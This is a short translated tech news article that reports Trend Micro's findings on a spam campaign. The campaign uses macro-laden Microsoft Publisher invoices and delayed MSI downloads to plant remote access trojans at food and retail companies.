Trend Micro researchers state that new macro downloaders are using Microsoft Publisher (PUB) files and spam mails to hack into the network of companies in the food and retail sectors.
Last month, more than 50 companies from these sectors were involved in the campaign. These include Starbucks and Harris Teeter. Trend Micro also detected attacks against the U.S. Department of Agriculture and the Financial Sector.
The use of PUB files distinguishes this form of hacking from others. PUB files are usually not associated with macro malware. Together with socially-engineered spam mails from operations teams, the PUB invoices appear to be legitimate. After they are opened, they come with rogue Microsoft Installer (MSI) files that contact the command-and-control (C&C) servers to install remote access trojans.
Because PUB files are rarely used with macro-downloaders and MSI files are also used for legitimate installations, infections may remain unnoticed by users and standard anti-malware tools for a long time. In addition, companies in the food and retail sectors are in the busiest quarter of the year, which increases the chance that they will become victims of spam.
The use of PUB files by cyber criminals increases this risk, because employees may not see the files as potential threats. The installed trojans can then easily be hidden until the attackers are ready to attack or download new malware.
Furthermore, the campaign prevents it from being noticed by scheduling the downloading of the MSI file instead of downloading it directly when the PUB files are opened. The finally installed trojans can steal customer data or penetrate business networks.This news article was automatically translated from Dutch to give Techzine.eu a head start. All news articles after September 1, 2019 are written in native English and NOT translated. All our background stories are written in native English as well. For more information read our launch article.